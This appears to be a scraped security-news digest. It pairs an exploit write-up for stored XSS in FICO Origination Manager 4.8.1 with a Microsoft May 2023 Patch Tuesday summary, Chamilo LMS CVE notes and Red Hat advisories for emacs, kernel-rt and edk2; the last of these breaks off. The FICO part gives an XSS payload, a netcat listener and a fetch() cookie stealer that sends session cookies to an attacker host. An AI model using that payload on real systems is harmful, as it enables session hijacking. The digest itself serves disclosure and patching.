Multiple stored cross-site scripting (XSS) vulnerabilities in FICO Origination Manager Decision Module 4.8.1 allow attackers to execute arbitrary web scripts or HTML via a crafted payload.

    # Exploit Title: Stored-XSS in FICO Origination Manager Decision Module 4.8.1 Leads to Session Hijacking# Date: 2023-05-07# Exploit Author: Matei Josephs# Vendor Homepage: https://www.fico.com/# Version: FICO Origination Manager Decision Module 4.8.1# CVE : CVE-2023-30056, CVE-2023-30057Introduction=================Multiple stored cross-site scripting (XSS) vulnerabilities in FICO Origination Manager Decision Module 4.8.1 allow to execute code in the context of the victim's browser using a crafted payload. Additionally, an attacker with initial access to the application, can get the JSESSIONID cookie of another user and take over their session. These two findings can be chained together.Proof of Concept=================All description fields when adding Categories and Products, Product Strategies, Decision Flows, Data Object References, Data Methods, Data Method Sequences, Rulesets, Decision Tables, Decision Trees, Score Models, Scenarios, or Internal Services are vulnerable to a stored XSS using the following payload:   <img/src/onerror=prompt(document.cookie)>An attacker could implement a cookie stealer as follows:  On the attacker's machine:    nc -lvnp <PORT>  In one of the vulnerable description fields:    <img/src/onerror=fetch('http://<ATTACKER-IP>:<PORT>/'+document.cookie)>When a victim would visit the page where the payload was injected, the attacker would receive their JSESSIONID cookie. The attacker could then use the JSESSIONID cookie to log into the Origination Manager Decision Module as the victim.

CVE-2023-30057: FICO Origination Manager Decision Module 4.8.1 XSS

One of the vulnerabilities is being actively exploited in the wild, according to Microsoft, the fourth month in a row in which this is the case.

Tuesday, May 9, 2023 13:05

Microsoft disclosed 40 vulnerabilities across its suite of products and software Tuesday, the fewest the company’s included in a Patch Tuesday since December 2019.

However, two of the vulnerabilities is being actively exploited in the wild, according to Microsoft, the fourth month in a row in which this is the case for the monthly roundup of security issues.

In all, this Patch Tuesday includes seven critical vulnerabilities and 33 that are considered “important.”

One of the zero-day vulnerabilities included this month is CVE-2023-29336, an elevation of privilege vulnerability in the Win32k kernel mode driver. An adversary could exploit this vulnerability to gain SYSTEM privileges.

The most serious vulnerability disclosed Tuesday is CVE-2023-24941, a remote code execution vulnerability in the Windows Network File System that has a severity rating of 9.8 out of 10. An adversary could exploit this vulnerability over a network by making an unauthenticated, specially crafted call to an NFS service to execute code on the targeted machine. In addition to today’s patch, Microsoft also outlines several mitigation steps affected users can deploy to prevent the execution of this vulnerability.

Another remote code execution vulnerability, CVE-2023-29325, exists in Windows OLE that is also critical. An attacker could trigger this issue by tricking a target into opening a specially crafted, malicious email. The vulnerability can even trigger if the user just opens the email in the Preview pane.

CVE-2023-24955 is another remote code execution vulnerability in Microsoft SharePoint Server that Microsoft considers “more likely” to be exploited.

MSHTML, a software component that renders web pages in Microsoft browsers, also contains a critical vulnerability that could allow an attacker to gain admin privileges on a targeted device. CVE-2023-29324, however, is more difficult for an attacker to trigger than the other vulnerabilities mentioned above because it requires “an attacker to take additional actions prior to exploitation to prepare the target environment,” according to Microsoft.

There are two other critical vulnerabilities in this month’s security update that Microsoft considers “less likely” to be exploited:

*   CVE-2023-24943: Windows PGM remote code execution vulnerability
*   CVE-2023-28283: Windows LDAP remote code execution vulnerability

There are also three important vulnerabilities considered to be “more likely” to be exploited, though are not considered as serious:

*   CVE-2023-24949: Windows Kernel elevation of privilege vulnerability
*   CVE-2023-24950: Microsoft SharePoint Server spoofing vulnerability
*   CVE-2023-24954: Microsoft SharePoint Server information disclosure vulnerability

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 61705 - 61707,  61714 - 61720, 61722 and 61723.

Microsoft Patch Tuesday for May 2023 — Fewest vulnerabilities disclosed in a month in three-plus years

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the course category parameters.

CVE-2023-31804: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skype and linedin_url parameters.

CVE-2023-31802: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the skills wheel parameter.

CVE-2023-31801: Security issues - Chamilo LMS

Cross Site Scripting vulnerability found in Chamilo Lms v.1.11.18 allows a local attacker to execute arbitrary code via the forum title parameter.

CVE-2023-31800: Security issues - Chamilo LMS

Red Hat Security Advisory 2023-2626-01 - GNU Emacs is a powerful, customizable, self-documenting text editor. It provides special code editing features, a scripting language, and the capability to read e-mail and news. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: emacs security update  
Advisory ID:       RHSA-2023:2626-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2626  
Issue date:        2023-05-09  
CVE Names:         CVE-2022-48337 CVE-2022-48338 CVE-2022-48339  
                   CVE-2023-2491  
====================================================================  
1. Summary:

An update for emacs is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

GNU Emacs is a powerful, customizable, self-documenting text editor. It  
provides special code editing features, a scripting language (elisp), and  
the capability to read e-mail and news.

Security Fix(es):

* emacs: Regression of CVE-2023-28617 fixes in the Red Hat Enterprise Linux  
(CVE-2023-2491)

* emacs: command execution via shell metacharacters (CVE-2022-48337)

* emacs: local command injection in ruby-mode.el (CVE-2022-48338)

* emacs: command injection vulnerability in htmlfontify.el (CVE-2022-48339)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2171987 - CVE-2022-48337 emacs: command execution via shell metacharacters  
2171988 - CVE-2022-48338 emacs: local command injection in ruby-mode.el  
2171989 - CVE-2022-48339 emacs: command injection vulnerability in htmlfontify.el  
2192873 - CVE-2023-2491 emacs: Regression of CVE-2023-28617 fixes in the Red Hat Enterprise Linux

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
emacs-27.2-8.el9_2.1.src.rpm

aarch64:  
emacs-27.2-8.el9_2.1.aarch64.rpm  
emacs-common-27.2-8.el9_2.1.aarch64.rpm  
emacs-common-debuginfo-27.2-8.el9_2.1.aarch64.rpm  
emacs-debuginfo-27.2-8.el9_2.1.aarch64.rpm  
emacs-debugsource-27.2-8.el9_2.1.aarch64.rpm  
emacs-lucid-27.2-8.el9_2.1.aarch64.rpm  
emacs-lucid-debuginfo-27.2-8.el9_2.1.aarch64.rpm  
emacs-nox-27.2-8.el9_2.1.aarch64.rpm  
emacs-nox-debuginfo-27.2-8.el9_2.1.aarch64.rpm

noarch:  
emacs-filesystem-27.2-8.el9_2.1.noarch.rpm

ppc64le:  
emacs-27.2-8.el9_2.1.ppc64le.rpm  
emacs-common-27.2-8.el9_2.1.ppc64le.rpm  
emacs-common-debuginfo-27.2-8.el9_2.1.ppc64le.rpm  
emacs-debuginfo-27.2-8.el9_2.1.ppc64le.rpm  
emacs-debugsource-27.2-8.el9_2.1.ppc64le.rpm  
emacs-lucid-27.2-8.el9_2.1.ppc64le.rpm  
emacs-lucid-debuginfo-27.2-8.el9_2.1.ppc64le.rpm  
emacs-nox-27.2-8.el9_2.1.ppc64le.rpm  
emacs-nox-debuginfo-27.2-8.el9_2.1.ppc64le.rpm

s390x:  
emacs-27.2-8.el9_2.1.s390x.rpm  
emacs-common-27.2-8.el9_2.1.s390x.rpm  
emacs-common-debuginfo-27.2-8.el9_2.1.s390x.rpm  
emacs-debuginfo-27.2-8.el9_2.1.s390x.rpm  
emacs-debugsource-27.2-8.el9_2.1.s390x.rpm  
emacs-lucid-27.2-8.el9_2.1.s390x.rpm  
emacs-lucid-debuginfo-27.2-8.el9_2.1.s390x.rpm  
emacs-nox-27.2-8.el9_2.1.s390x.rpm  
emacs-nox-debuginfo-27.2-8.el9_2.1.s390x.rpm

x86_64:  
emacs-27.2-8.el9_2.1.x86_64.rpm  
emacs-common-27.2-8.el9_2.1.x86_64.rpm  
emacs-common-debuginfo-27.2-8.el9_2.1.x86_64.rpm  
emacs-debuginfo-27.2-8.el9_2.1.x86_64.rpm  
emacs-debugsource-27.2-8.el9_2.1.x86_64.rpm  
emacs-lucid-27.2-8.el9_2.1.x86_64.rpm  
emacs-lucid-debuginfo-27.2-8.el9_2.1.x86_64.rpm  
emacs-nox-27.2-8.el9_2.1.x86_64.rpm  
emacs-nox-debuginfo-27.2-8.el9_2.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-48337  
https://access.redhat.com/security/cve/CVE-2022-48338  
https://access.redhat.com/security/cve/CVE-2022-48339  
https://access.redhat.com/security/cve/CVE-2023-2491  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFo1BtzjgjWX9erEAQhtpxAAoYp1zA1tl18b1JFFsuK7CcZQNgmeASuh  
GoEOuOn1fS0dq5J63UuUEcVg3x2oI5hsrgsQSpEbUt+Ehm/4S9gaIm0UZQmjraE+  
8UcshzgQAku2+XKpNw63HE7iKZF8M42C9AFDkUuOAYywwMmFBF+uJKG+Brc+Ah7e  
fOtQBVu5zsDiD0GRq4p+52MJ+MxRKlIernJXlPA7TX3UV3rWBApgnXpiDsnMbEsx  
D+N9sXVnks5Gxq9K1XMqEwKTUuGCdmTZroRqrwwlPs17nXfpxadXf/6v7vLbPICs  
7tEJFHB30/KgL/vUs8Tl5iLVlH96z1FNRU1yLYkETjGuamNJGX00iMlGxIJjPrlx  
YVvgJjk0KFeNFhliJtXWgwLElsdWszIafMuCPU7OTUzpowsak3+h7oErVtoSjJpb  
EP/SouzhBqbyMI1VllcM6bcmhvU4DM8NnIL/N3lJSZwXYnubI82zlj/m82c99210  
H+WJii45v6D+h904FmWaB6Q+GsaqRYvKbZ22eMTAbye5CzIM55LrV56TVx7Ahl1Z  
zs/5MmXcmod8TiKONQtlM9BVcVf3nb1NgxKTDeRzAkwBeCrH/zVh4z0+aNeQTVJO  
1xE1bhGSDO311P6dODjOEg7HyUbsMIP2vFU7ULSqLzXtXmaICltBGhDzEGr26dq5  
qM/56o0jSioÌtx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-2626-01

Red Hat Security Advisory 2023-2148-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include buffer overflow, bypass, denial of service, double free, memory leak, null pointer, out of bounds read, privilege escalation, traversal, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:2148-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2148  
Issue date:        2023-05-09  
CVE Names:         CVE-2021-26341 CVE-2021-33655 CVE-2022-1462  
                   CVE-2022-1789 CVE-2022-1882 CVE-2022-2196  
                   CVE-2022-2663 CVE-2022-3028 CVE-2022-3435  
                   CVE-2022-3522 CVE-2022-3524 CVE-2022-3566  
                   CVE-2022-3567 CVE-2022-3619 CVE-2022-3623  
                   CVE-2022-3625 CVE-2022-3628 CVE-2022-3640  
                   CVE-2022-3707 CVE-2022-4128 CVE-2022-4129  
                   CVE-2022-20141 CVE-2022-21505 CVE-2022-28388  
                   CVE-2022-33743 CVE-2022-39188 CVE-2022-39189  
                   CVE-2022-41674 CVE-2022-42703 CVE-2022-42720  
                   CVE-2022-42721 CVE-2022-42722 CVE-2022-42896  
                   CVE-2022-43750 CVE-2022-47929 CVE-2023-0394  
                   CVE-2023-0461 CVE-2023-0590 CVE-2023-1195  
                   CVE-2023-1382  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux NFV (v. 9) - x86_64  
Red Hat Enterprise Linux RT (v. 9) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* use-after-free in l2cap_connect and l2cap_le_connect_req in  
net/bluetooth/l2cap_core.c (CVE-2022-42896)

* net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

* hw: cpu: AMD CPUs may transiently execute beyond unconditional direct  
branch (CVE-2021-26341)

* malicious data for FBIOPUT_VSCREENINFO ioctl may cause OOB write memory  
(CVE-2021-33655)

* possible race condition in drivers/tty/tty_buffers.c (CVE-2022-1462)

* KVM: NULL pointer dereference in kvm_mmu_invpcid_gva (CVE-2022-1789)

* use-after-free in free_pipe_info() could lead to privilege escalation  
(CVE-2022-1882)

* KVM: nVMX: missing IBPB when exiting from nested guest can lead to  
Spectre v2 attacks (CVE-2022-2196)

* netfilter: nf_conntrack_irc message handling issue (CVE-2022-2663)

* race condition in xfrm_probe_algs can lead to OOB read/write  
(CVE-2022-3028)

* out-of-bounds read in fib_nh_match of the file net/ipv4/fib_semantics.c  
(CVE-2022-3435)

* race condition in hugetlb_no_page() in mm/hugetlb.c (CVE-2022-3522)

* memory leak in ipv6_renew_options() (CVE-2022-3524)

* data races around icsk->icsk_af_ops in do_ipv6_setsockopt (CVE-2022-3566)

* data races around sk->sk_prot (CVE-2022-3567)

* memory leak in l2cap_recv_acldata of the file net/bluetooth/l2cap_core.c  
(CVE-2022-3619)

* denial of service in follow_page_pte in mm/gup.c due to poisoned pte  
entry (CVE-2022-3623)

* use-after-free after failed devlink reload in devlink_param_get  
(CVE-2022-3625)

* USB-accessible buffer overflow in brcmfmac (CVE-2022-3628)

* use after free flaw in l2cap_conn_del in net/bluetooth/l2cap_core.c  
(CVE-2022-3640)

* Double-free in split_2MB_gtt_entry when function  
intel_gvt_dma_map_guest_page failed (CVE-2022-3707)

* mptcp: NULL pointer dereference in subflow traversal at disconnect time  
(CVE-2022-4128)

* l2tp: missing lock when clearing sk_user_data can lead to NULL pointer  
dereference (CVE-2022-4129)

* igmp: use-after-free in ip_check_mc_rcu when opening and closing inet  
sockets (CVE-2022-20141)

* lockdown bypass using IMA (CVE-2022-21505)

* double free in usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c  
(CVE-2022-28388)

* network backend may cause Linux netfront to use freed SKBs (XSA-405)  
(CVE-2022-33743)

* unmap_mapping_range() race with munmap() on VM_PFNMAP mappings leads to  
stale TLB entry (CVE-2022-39188)

* TLB flush operations are mishandled in certain KVM_VCPU_PREEMPTED leading  
to guest malfunctioning (CVE-2022-39189)

* u8 overflow problem in cfg80211_update_notlisted_nontrans()  
(CVE-2022-41674)

* use-after-free related to leaf anon_vma double reuse (CVE-2022-42703)

* use-after-free in bss_ref_get in net/wireless/scan.c (CVE-2022-42720)

* BSS list corruption in cfg80211_add_nontrans_list in net/wireless/scan.c  
(CVE-2022-42721)

* Denial of service in beacon protection for P2P-device (CVE-2022-42722)

* memory corruption in usbmon driver (CVE-2022-43750)

* NULL pointer dereference in traffic control subsystem (CVE-2022-47929)

* NULL pointer dereference in rawv6_push_pending_frames (CVE-2023-0394)

* use-after-free due to race condition in qdisc_graft() (CVE-2023-0590)

* use-after-free caused by invalid pointer hostname in fs/cifs/connect.c  
(CVE-2023-1195)

* denial of service in tipc_conn_close (CVE-2023-1382)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 9.2 Release Notes linked from the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2061703 - CVE-2021-26341 hw: cpu: AMD CPUs may transiently execute beyond unconditional direct branch  
2073091 - CVE-2022-28388 kernel: double free in usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c  
2078466 - CVE-2022-1462 kernel: possible race condition in drivers/tty/tty_buffers.c  
2089701 - CVE-2022-1882 kernel: use-after-free in free_pipe_info() could lead to privilege escalation  
2090723 - CVE-2022-1789 kernel: KVM: NULL pointer dereference in kvm_mmu_invpcid_gva  
2106830 - CVE-2022-21505 kernel: lockdown bypass using IMA  
2107924 - CVE-2022-33743 kernel: network backend may cause Linux netfront to use freed SKBs (XSA-405)  
2108691 - CVE-2021-33655 kernel: malicious data for FBIOPUT_VSCREENINFO ioctl may cause OOB write memory  
2114937 - CVE-2022-20141 kernel: igmp: use-after-free in ip_check_mc_rcu when opening and closing inet sockets  
2122228 - CVE-2022-3028 kernel: race condition in xfrm_probe_algs can lead to OOB read/write  
2123056 - CVE-2022-2663 kernel: netfilter: nf_conntrack_irc message handling issue  
2124788 - CVE-2022-39189 kernel: TLB flush operations are mishandled in certain KVM_VCPU_PREEMPTED leading to guest malfunctioning  
2130141 - CVE-2022-39188 kernel: unmap_mapping_range() race with munmap() on VM_PFNMAP mappings leads to stale TLB entry  
2133483 - CVE-2022-42703 kernel: use-after-free related to leaf anon_vma double reuse  
2133490 - CVE-2022-3435 kernel: out-of-bounds read in fib_nh_match of the file net/ipv4/fib_semantics.c  
2134377 - CVE-2022-41674 kernel: u8 overflow problem in cfg80211_update_notlisted_nontrans()  
2134380 - CVE-2022-4128 kernel: mptcp: NULL pointer dereference in subflow traversal at disconnect time  
2134451 - CVE-2022-42720 kernel: use-after-free in bss_ref_get in net/wireless/scan.c  
2134506 - CVE-2022-42721 kernel: BSS list corruption in cfg80211_add_nontrans_list in net/wireless/scan.c  
2134517 - CVE-2022-42722 kernel: Denial of service in beacon protection for P2P-device  
2134528 - CVE-2022-4129 kernel: l2tp: missing lock when clearing sk_user_data can lead to NULL pointer dereference  
2137979 - CVE-2022-3707 kernel: Double-free in split_2MB_gtt_entry when function intel_gvt_dma_map_guest_page failed  
2139610 - CVE-2022-3640 kernel: use after free flaw in l2cap_conn_del in net/bluetooth/l2cap_core.c  
2143893 - CVE-2022-3566 kernel: data races around icsk->icsk_af_ops in do_ipv6_setsockopt  
2143943 - CVE-2022-3567 kernel: data races around sk->sk_prot  
2144720 - CVE-2022-3625 kernel: use-after-free after failed devlink reload in devlink_param_get  
2147364 - CVE-2022-42896 kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c  
2150947 - CVE-2022-3524 kernel: memory leak in ipv6_renew_options()  
2150960 - CVE-2022-3628 kernel: USB-accessible buffer overflow in brcmfmac  
2150979 - CVE-2022-3522 kernel: race condition in hugetlb_no_page() in mm/hugetlb.c  
2151270 - CVE-2022-43750 kernel: memory corruption in usbmon driver  
2154171 - CVE-2023-1195 kernel: use-after-free caused by invalid pointer hostname in fs/cifs/connect.c  
2154235 - CVE-2022-3619 kernel: memory leak in l2cap_recv_acldata of the file net/bluetooth/l2cap_core.c  
2160023 - CVE-2022-2196 kernel: KVM: nVMX: missing IBPB when exiting from nested guest can lead to Spectre v2 attacks  
2162120 - CVE-2023-0394 kernel: NULL pointer dereference in rawv6_push_pending_frames  
2165721 - CVE-2022-3623 kernel: denial of service in follow_page_pte in mm/gup.c due to poisoned pte entry  
2165741 - CVE-2023-0590 kernel: use-after-free due to race condition in qdisc_graft()  
2168246 - CVE-2022-47929 kernel: NULL pointer dereference in traffic control subsystem  
2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets  
2177371 - CVE-2023-1382 kernel: denial of service in tipc_conn_close

6. Package List:

Red Hat Enterprise Linux NFV (v. 9):

Source:  
kernel-rt-5.14.0-284.11.1.rt14.296.el9_2.src.rpm

x86_64:  
kernel-rt-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-core-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-core-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-kvm-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-modules-core-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-devel-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-kvm-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-modules-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-modules-core-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm

Red Hat Enterprise Linux RT (v. 9):

Source:  
kernel-rt-5.14.0-284.11.1.rt14.296.el9_2.src.rpm

x86_64:  
kernel-rt-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-core-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-core-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-modules-core-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-devel-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-modules-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-modules-core-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-284.11.1.rt14.296.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-26341  
https://access.redhat.com/security/cve/CVE-2021-33655  
https://access.redhat.com/security/cve/CVE-2022-1462  
https://access.redhat.com/security/cve/CVE-2022-1789  
https://access.redhat.com/security/cve/CVE-2022-1882  
https://access.redhat.com/security/cve/CVE-2022-2196  
https://access.redhat.com/security/cve/CVE-2022-2663  
https://access.redhat.com/security/cve/CVE-2022-3028  
https://access.redhat.com/security/cve/CVE-2022-3435  
https://access.redhat.com/security/cve/CVE-2022-3522  
https://access.redhat.com/security/cve/CVE-2022-3524  
https://access.redhat.com/security/cve/CVE-2022-3566  
https://access.redhat.com/security/cve/CVE-2022-3567  
https://access.redhat.com/security/cve/CVE-2022-3619  
https://access.redhat.com/security/cve/CVE-2022-3623  
https://access.redhat.com/security/cve/CVE-2022-3625  
https://access.redhat.com/security/cve/CVE-2022-3628  
https://access.redhat.com/security/cve/CVE-2022-3640  
https://access.redhat.com/security/cve/CVE-2022-3707  
https://access.redhat.com/security/cve/CVE-2022-4128  
https://access.redhat.com/security/cve/CVE-2022-4129  
https://access.redhat.com/security/cve/CVE-2022-20141  
https://access.redhat.com/security/cve/CVE-2022-21505  
https://access.redhat.com/security/cve/CVE-2022-28388  
https://access.redhat.com/security/cve/CVE-2022-33743  
https://access.redhat.com/security/cve/CVE-2022-39188  
https://access.redhat.com/security/cve/CVE-2022-39189  
https://access.redhat.com/security/cve/CVE-2022-41674  
https://access.redhat.com/security/cve/CVE-2022-42703  
https://access.redhat.com/security/cve/CVE-2022-42720  
https://access.redhat.com/security/cve/CVE-2022-42721  
https://access.redhat.com/security/cve/CVE-2022-42722  
https://access.redhat.com/security/cve/CVE-2022-42896  
https://access.redhat.com/security/cve/CVE-2022-43750  
https://access.redhat.com/security/cve/CVE-2022-47929  
https://access.redhat.com/security/cve/CVE-2023-0394  
https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/cve/CVE-2023-0590  
https://access.redhat.com/security/cve/CVE-2023-1195  
https://access.redhat.com/security/cve/CVE-2023-1382  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.2_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFo0NtzjgjWX9erEAQhskQ//eAqMI93djEsADoo5zb3EO3xEGrb//Im2  
ptPycHLLL6ZG+t/+1PiMk/e8LwhV2hrxz7nzc4xh8tNO4TRuF0WK/sR8Iv4y6/Fs  
95X25NgEndOlHk7uUVgEdTYvZnpNh27XJwyEHDu6HV8suxY6gfbYHqV7zlkGBi43  
zQA+sfEDXFVfvLug/RpaD0J7wXc0JyUoG4OratWV1E37zw9mNPSX1P0bFy4QoKXL  
rhG1Xc+qSWK3kjnJjpeU8nIJGhL2oJDFVuICkiC+aEp7C//DE1TA7L7u3Z+7Tou/  
BpPmjMyfXF/UQYZtJCrCRiTj/RsRIqaUSoy3/3MO8jxVMR6FIm/QTjY63JCGfj6A  
OahLv77oKDJXuHQQ7JkHycKMOc+JfX/ZNtxtgn2gYFfpjPTY/klTJP8iM9KhnTuQ  
2lF5jvYJihYhGio+cyl5Ad/XmzsHh7cTQR3XKtNa7p9/+QkAKt10LhbzxvebThFd  
cZtLUsdph4wO6T+RrZ5XdwvOSox1C40mfOnwJO41M/9GXPHoxhmwrZYBWKE1PY0J  
Jq9m+pYgKv+ioTW1FWloM22mu0PW/L5F3djzAVujShX0iRgfW2Aao3n+L8A22bYD  
Q+5LbFsWZwpeK7zXgXocJlY7j667sT9UGqBwk4xMfAiS5A0p2Zo1rkIre2lvmF2D  
JJU7NBGa9VU=YrUX  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-2148-01

Red Hat Security Advisory 2023-2458-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include buffer overflow, bypass, denial of service, double free, memory leak, null pointer, out of bounds read, privilege escalation, traversal, and use-after-free vulnerabilities.

Red Hat Security Advisory 2023-2458-01

Red Hat Security Advisory 2023-2165-01 - EDK is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Issues addressed include double free, privilege escalation, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: edk2 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:2165-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2165  
Issue date:        2023-05-09  
CVE Names:         CVE-2021-38578 CVE-2022-4304 CVE-2022-4450  
                   CVE-2023-0215 CVE-2023-0286  
====================================================================  
1. Summary:

An update for edk2 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - noarch  
Red Hat Enterprise Linux CRB (v. 9) - aarch64, noarch, x86_64

3. Description:

EDK (Embedded Development Kit) is a project to enable UEFI support for  
Virtual Machines. This package contains a sample 64-bit UEFI firmware for  
QEMU and KVM.

Security Fix(es):

* openssl: X.400 address type confusion in X.509 GeneralName  
(CVE-2023-0286)

* edk2: integer underflow in SmmEntryPoint function leads to potential SMM  
privilege escalation (CVE-2021-38578)

* openssl: timing attack in RSA Decryption implementation (CVE-2022-4304)

